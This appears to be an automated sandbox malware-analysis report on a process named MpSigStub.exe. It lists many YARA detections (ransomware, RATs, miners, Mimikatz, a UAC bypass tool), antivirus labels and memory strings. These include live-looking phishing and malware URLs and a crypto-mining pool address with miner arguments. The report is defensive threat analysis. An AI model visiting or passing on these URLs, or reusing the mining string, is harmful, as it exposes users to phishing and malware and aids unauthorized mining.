36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x36ae9f:$: OnlineTime= 0x36aedd:$: clientpath= 0x36aeec:$: serverpath=
Click to see the 445 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Antivirus detection for URL or domain

Show sources

Source: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php	Avira URL Cloud: Label: phishing
Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc	Avira URL Cloud: Label: malware
Source: http://costacars.es/ico/ortodox.php	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: MpSigStub.exe.5556.36.memstrmin	Malware Configuration Extractor: CryLock {"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}

Yara detected Njrat

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6284577103.00000197A4BC1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Multi AV Scanner detection for domain / URL

Show sources

Source: http://www.bonusesfound.ml/update/index.php	Virustotal: Detection: 13%			Perma Link
Source: http://110.42.4.180:	Virustotal: Detection: 13%			Perma Link

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: 36.3.MpSigStub.exe.197a4734ab6.49.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31aed77.165.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31aed77.74.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz

Show sources

Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp

String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

Yara detected Coinhive miner

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36f3b2a.205.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4301256.107.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a2f5336d.108.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4301256.84.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4301256.170.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36f3b2a.193.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a48adbfa.121.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36f3b2a.215.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a36f3b2a.148.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a365984d.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a365bea1.190.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a48adbfa.121.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6319425963.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6422770651.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6349431685.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6423333763.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6340510692.00000197A4B3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6337630194.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6356649431.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6300924417.00000197A4314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6309425115.00000197A492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6421798400.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6304560058.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6314037891.00000197A4314000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6330651040.00000197A36F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6310770552.00000197A4B3C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6424034919.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6413956773.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6415046546.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6406320906.00000197A3D81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6414541213.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6333426467.00000197A331E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6339257691.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6407260909.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6299736334.00000197A2ED4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6315364038.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6407733822.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6316787263.00000197A40EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6273910781.00000197A3D92000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6406830616.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6294115539.00000197A3970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6289913928.00000197A39B3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6338624600.00000197A45E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected BitCoin Miner

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a4a13be1.134.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4a13be1.171.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4a13be1.209.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4a13be1.57.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6337978043.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6287415616.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6325869951.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.63.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3279566.201.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc49fa.86.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a39e033e.65.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc6bfe.187.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a477ec45.51.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4764291.52.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4c04b1a.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.63.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4644266.106.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3ff325f.122.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4245a35.92.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4777703.50.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.208.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc49fa.186.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a42450e1.91.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4c03116.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.95.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a327ab6a.200.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4644a6a.105.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a464526e.104.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a4dc6bfe.87.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a424480d.93.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a434950c.82.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.95.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a31eb36e.135.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6343593773.00000197A4DA5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6275847061.00000197A4698000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6351629812.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6269311104.00000197A4C03000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6289584259.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6324954542.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6347606531.00000197A3C46000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6270634530.00000197A4698000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6342326827.00000197A41F5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6434024184.00000197A433E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6304991595.00000197A4237000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6436059336.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6317874324.00000197A4F72000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.6308756420.00000197A3F60000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Found strings related to Crypto-Mining

Show sources

Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: pools.txt
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: href="https://platform.jsecoin.com/?lander=1&utm_source=referral&utm_campaign=aff'
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: ld_library_path/tmp/udevs-acryptonight-ostratum+tcp://pool.fri3nds.in:8080-ulinuxserver-px-t$threads-bfiecho"/5***curl-
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: stratum+tcp://
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: xmrminer
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: URL of mining server
